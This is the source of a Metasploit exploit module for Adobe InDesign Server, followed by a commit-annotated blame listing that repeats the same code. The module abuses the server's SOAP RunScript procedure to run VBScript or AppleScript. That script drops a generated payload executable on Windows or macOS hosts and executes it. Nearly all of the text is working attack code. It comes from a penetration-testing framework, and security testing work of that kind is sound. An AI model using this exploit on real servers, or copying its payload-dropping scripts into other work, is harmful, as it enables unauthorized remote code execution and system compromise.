modules/exploits/multi/misc/indesign_server_soap.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',
      'Description'    => %q{
          This module abuses the "RunScript" procedure provided by the SOAP interface of
        Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).

        The exploit drops the payload on the server and must be removed manually.
      },
      'Author'         =>
        [
          'h0ng10', # Vulnerability discovery / Metasploit module
          'juan vazquez' # MacOSX target
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => %w{ osx win },
      'Privileged'     => false,
      'DisclosureDate' => '2012-11-11',
      'References'     =>
        [
          [ 'OSVDB', '87548'],
          [ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]
        ],
      'Targets'        =>
        [
          [
            'Indesign CS6 Server / Windows (64 bits)',
            {
              'Arch'     => ARCH_X64,
              'Platform' => 'win'
            }
          ],
          [
            'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',
            {
              'Arch'     => ARCH_X64,
              'Platform' => 'osx'
            }
          ]
        ],
      'DefaultTarget'  => 0
    ))

    register_options( [ Opt::RPORT(12345) ])
  end


  def send_soap_request(script_code, script_type)
    script_code.gsub!(/&/, '&amp;')
    soap_xml = %Q{
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
  <SOAP-ENV:Body>
    <IDSP:RunScript>
      <IDSP:runScriptParameters>
        <IDSP:scriptText>#{script_code}</IDSP:scriptText>
        <IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>
      </IDSP:runScriptParameters>
    </IDSP:RunScript>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

    res = send_request_cgi({
      'uri'          => '/',
      'method'       => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data'         => soap_xml,
    }, 5)
  end


  def check()
    # Use a very simple javascript
    check_var = rand_text_numeric(10)
    checkscript =  'returnValue = "' + check_var + '"'

    res = send_soap_request(checkscript, "javascript")

    return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')

    return Exploit::CheckCode::Safe
  end

  def exploit

    if target.name =~ /Windows/
      print_status("Creating payload vbs script")
      encoded_payload = generate_payload_exe().unpack("H*").join
      exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"
      wsf = Rex::Text.rand_text_alpha(8)
      payload_var = Rex::Text.rand_text_alpha(8)
      exe_name_var = Rex::Text.rand_text_alpha(8)
      file_var = Rex::Text.rand_text_alpha(8)
      byte_var = Rex::Text.rand_text_alpha(8)
      shell_var = Rex::Text.rand_text_alpha(8)

      # This one creates a smaller vbs payload (without deletion)
      vbs = %Q{
Set #{wsf} = CreateObject("Scripting.FileSystemObject")
#{payload_var}  = "#{encoded_payload}"
#{exe_name_var} =  #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"
Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)
For x = 1 To Len(#{payload_var})-3 Step 2
  #{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)
  #{file_var}.write Chr(#{byte_var})
Next

#{file_var}.write Chr(#{byte_var})
#{file_var}.close

Set #{shell_var} = CreateObject("Wscript.Shell")
#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False
Set #{shell_var} = Nothing
returnValue = #{exe_name_var}
      }
      #	vbs = Msf::Util::EXE.to_exe_vbs(exe)
      print_status("Sending SOAP request")

      res = send_soap_request(vbs, "visual basic")
      if res != nil and res.body != nil then
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
        print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"
      end

    elsif target.name =~ /Mac OS X/

      print_status("Creating payload apple script")

      exe_payload = generate_payload_exe
      b64_exe_payload = Rex::Text.encode_base64(exe_payload)
      b64_payload_name = rand_text_alpha(rand(5) + 5)
      payload_name = rand_text_alpha(rand(5) + 5)

      apple_script = %Q{
set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission
write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp
close access fp
do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"
do shell script "rm /tmp/#{b64_payload_name}.txt"
do shell script "chmod +x /tmp/#{payload_name}"
do shell script "/tmp/#{payload_name}"
set returnValue to "/tmp/#{payload_name}"
      }

      print_status("Sending SOAP request")

      res = send_soap_request(apple_script, "applescript")

      if res != nil and res.body != nil then
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
        file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?
        print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"
      elsif not res
        print_status "No response, it's expected"
        print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"
      end

    end

  end
end
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::EXE`
Retab modules 2013-08-30 16:28:54 -05:00
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',`
			`'Description' => %q{`
			`This module abuses the "RunScript" procedure provided by the SOAP interface of`
55 pages of spelling done 2017-09-07 21:18:50 -04:00			`Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).`
Retab modules 2013-08-30 16:28:54 -05:00
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`The exploit drops the payload on the server and must be removed manually.`
			`},`
			`'Author' =>`
			`[`
			`'h0ng10', # Vulnerability discovery / Metasploit module`
			`'juan vazquez' # MacOSX target`
			`],`
			`'License' => MSF_LICENSE,`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ osx win },`
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2012-11-11',`
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '87548'],`
Update broken secunia references 2023-03-23 10:19:30 +00:00			`[ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]`
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`],`
			`'Targets' =>`
			`[`
			`[`
			`'Indesign CS6 Server / Windows (64 bits)',`
			`{`
Implement first pass of architecture/platform refactor 2016-10-28 07:16:05 +10:00			`'Arch' => ARCH_X64,`
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`'Platform' => 'win'`
			`}`
			`],`
			`[`
			`'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',`
			`{`
Implement first pass of architecture/platform refactor 2016-10-28 07:16:05 +10:00			`'Arch' => ARCH_X64,`
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`'Platform' => 'osx'`
			`}`
			`]`
			`],`
			`'DefaultTarget' => 0`
			`))`
Retab modules 2013-08-30 16:28:54 -05:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options( [ Opt::RPORT(12345) ])`
added support for Mac OS X 2012-12-04 22:04:21 +01:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

added support for Mac OS X 2012-12-04 22:04:21 +01:00			`def send_soap_request(script_code, script_type)`
			`script_code.gsub!(/&/, '&')`
			`soap_xml = %Q{`
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"`
			`xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"`
			`xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">`
			`<SOAP-ENV:Body>`
			`<IDSP:RunScript>`
			`<IDSP:runScriptParameters>`
			`<IDSP:scriptText>#{script_code}</IDSP:scriptText>`
			`<IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>`
			`</IDSP:runScriptParameters>`
			`</IDSP:RunScript>`
			`</SOAP-ENV:Body>`
			`</SOAP-ENV:Envelope>`
			`}`

			`res = send_request_cgi({`
			`'uri' => '/',`
			`'method' => 'POST',`
			`'content-type' => 'application/x-www-form-urlencoded',`
			`'data' => soap_xml,`
			`}, 5)`
			`end`


			`def check()`
			`# Use a very simple javascript`
			`check_var = rand_text_numeric(10)`
			`checkscript = 'returnValue = "' + check_var + '"'`

			`res = send_soap_request(checkscript, "javascript")`

			`return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')`

			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`

			`if target.name =~ /Windows/`
			`print_status("Creating payload vbs script")`
			`encoded_payload = generate_payload_exe().unpack("H*").join`
			`exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"`
			`wsf = Rex::Text.rand_text_alpha(8)`
			`payload_var = Rex::Text.rand_text_alpha(8)`
			`exe_name_var = Rex::Text.rand_text_alpha(8)`
			`file_var = Rex::Text.rand_text_alpha(8)`
			`byte_var = Rex::Text.rand_text_alpha(8)`
			`shell_var = Rex::Text.rand_text_alpha(8)`

			`# This one creates a smaller vbs payload (without deletion)`
			`vbs = %Q{`
			`Set #{wsf} = CreateObject("Scripting.FileSystemObject")`
			`#{payload_var} = "#{encoded_payload}"`
			`#{exe_name_var} = #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"`
			`Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)`
			`For x = 1 To Len(#{payload_var})-3 Step 2`
			`#{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)`
			`#{file_var}.write Chr(#{byte_var})`
			`Next`

			`#{file_var}.write Chr(#{byte_var})`
			`#{file_var}.close`

			`Set #{shell_var} = CreateObject("Wscript.Shell")`
			`#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False`
			`Set #{shell_var} = Nothing`
			`returnValue = #{exe_name_var}`
			`}`
			`# vbs = Msf::Util::EXE.to_exe_vbs(exe)`
			`print_status("Sending SOAP request")`

			`res = send_soap_request(vbs, "visual basic")`
			`if res != nil and res.body != nil then`
			`file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]`
			`print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"`
			`end`

			`elsif target.name =~ /Mac OS X/`

			`print_status("Creating payload apple script")`

			`exe_payload = generate_payload_exe`
			`b64_exe_payload = Rex::Text.encode_base64(exe_payload)`
			`b64_payload_name = rand_text_alpha(rand(5) + 5)`
			`payload_name = rand_text_alpha(rand(5) + 5)`

			`apple_script = %Q{`
			`set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission`
			`write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp`
			`close access fp`
			`do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"`
			`do shell script "rm /tmp/#{b64_payload_name}.txt"`
			`do shell script "chmod +x /tmp/#{payload_name}"`
			`do shell script "/tmp/#{payload_name}"`
			`set returnValue to "/tmp/#{payload_name}"`
			`}`

			`print_status("Sending SOAP request")`

			`res = send_soap_request(apple_script, "applescript")`

			`if res != nil and res.body != nil then`
			`file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]`
			`file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?`
			`print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"`
			`elsif not res`
			`print_status "No response, it's expected"`
			`print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"`
			`end`

			`end`

			`end`
			`end`